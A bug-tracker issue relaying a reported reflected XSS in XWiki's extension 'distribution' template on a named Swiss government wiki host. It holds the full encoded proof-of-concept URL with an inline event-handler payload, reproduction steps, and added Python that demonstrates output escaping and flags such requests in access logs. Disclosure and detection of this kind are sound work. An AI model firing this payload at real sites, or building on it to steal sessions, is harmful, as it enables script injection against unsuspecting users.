Details
- Type: Bug
- Resolution: Duplicate
- Priority: Major
- Fix Version/s: None
- Affects Version/s: 16.10.5
- Component/s: None
- Environment: openDesk 1.4.0
- Difficulty: Unknown
- N/A
- N/A
Description
The following issue was reported to us via NCSC:
Bug Key: STOP-disable
Bug Type: Execute code on client (e.g. XSS)
Scope: *.admin.ch
Endpoint: https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extension
IP used by the researcher: 59.92.92.87
Rating by the researcher:
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS Score: 6.1
Report:
Bug description:
Reflected XSS via parameters extensionId and extensionVersionConstraint on endpoint
https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss
Exploitation:
Step 1: Open a new browser tab and open the dev tools. Then open the link below in that tab. The JavaScript gets triggered and the domain gets printed in the console log.
Impact:
The attacker can run arbitrary JavaScript in the victim's browser.
Remediation:
Add URL encoding on the vulnerable parameter extensionId and extensionVersionConstraint
—
I can not reproduce this issue in XWiki 16.10.5 (as part of openDesk 1.4.0 run by our customer), but still wanted to report this issue.
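The report above names two query parameters (`extensionId` and `extensionVersionConstraint`) that are reflected into the `distribution` template without output encoding. The following is an added example, written for this issue and not code from the report, from XWiki or from openDesk: it percent-decodes the reported URL to show what actually reaches the page, models the reflection point with a hypothetical `TEMPLATE` string (XWiki's real template is Velocity; only the insertion of the value into a text node is modelled), contrasts unescaped output with HTML-entity escaping at the output point, and runs a small detector over two constructed access-log lines so that requests carrying markup or inline event handlers in the query string can be surfaced from server logs.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The URL exactly as given in the report (the server sees it percent-encoded).
REPORTED_URL = (
    "https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution"
    "&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c"
    "%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74"
    "%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a"
    "%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74"
    "%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73"
    "%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e"
    "&extensionVersionConstraint=%3dxss"
)

# Hypothetical stand-in for the reflection point in the template: the parameter
# value is placed inside a span's text node. Not the real XWiki template.
TEMPLATE = '<span class="extension-id">{value}</span>'
PREFIX, SUFFIX = TEMPLATE.split("{value}")

TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")            # start of an HTML tag
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)  # inline on*= handler


def decoded_params(url: str) -> dict:
    """Return each query parameter's first value, percent-decoded, i.e. what
    the server-side template actually receives."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_raw(value: str) -> str:
    """Vulnerable rendering: the decoded value lands in the HTML untouched."""
    return TEMPLATE.format(value=value)


def render_escaped(value: str) -> str:
    """Hardened rendering: HTML-entity escaping applied at the output point,
    so '<', '>', '&' and quotes can no longer open a tag or an attribute."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def breaks_out(rendered: str) -> bool:
    """True if the part of the output that came from the parameter contains a
    tag start, i.e. the value escaped the span's text node."""
    inner = rendered[len(PREFIX):len(rendered) - len(SUFFIX)]
    return bool(TAG_RE.search(inner))


def suspicious_request(log_line: str) -> bool:
    """Detection: flag a combined-format access-log line whose query string,
    once percent-decoded, contains a tag start or an inline event handler."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', log_line)
    if not m:
        return False
    decoded_query = unquote(urlsplit(m.group(1)).query)
    return bool(TAG_RE.search(decoded_query) or EVENT_HANDLER_RE.search(decoded_query))


# Constructed sample log lines (documentation-range IP, made-up timestamp):
# the first carries the reported query, the second a benign extension lookup.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:00:00:00 +0000] "GET /bin/view/Main/?'
    + urlsplit(REPORTED_URL).query + ' HTTP/1.1" 200 4096',
    '192.0.2.11 - - [01/Jan/2025:00:00:01 +0000] "GET /bin/view/Main/?'
    'xpage=distribution&extensionId=org.example%3Asome-extension'
    '&extensionVersionConstraint=1.0 HTTP/1.1" 200 4096',
]


if __name__ == "__main__":
    params = decoded_params(REPORTED_URL)
    print("decoded extensionId:", params["extensionId"])
    print("raw output breaks out of text node:", breaks_out(render_raw(params["extensionId"])))
    print("escaped output breaks out of text node:", breaks_out(render_escaped(params["extensionId"])))
    for line in SAMPLE_LOG:
        print("suspicious:", suspicious_request(line), "|", line[:60], "...")
```

The two things worth taking from the run are that the reflected value is only dangerous once it is decoded and written into the document unescaped, and that escaping at the output point (not URL-encoding the parameter, which the request already does) is what keeps `render_escaped` inside the text node. The detector deliberately decodes before matching, since the reported payload never contains a literal `<` in the request line.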
Attachments
Issue Links
- duplicates: XWIKI-23096 Reflected XSS vulnerability in extension and job_status_json templates (Closed)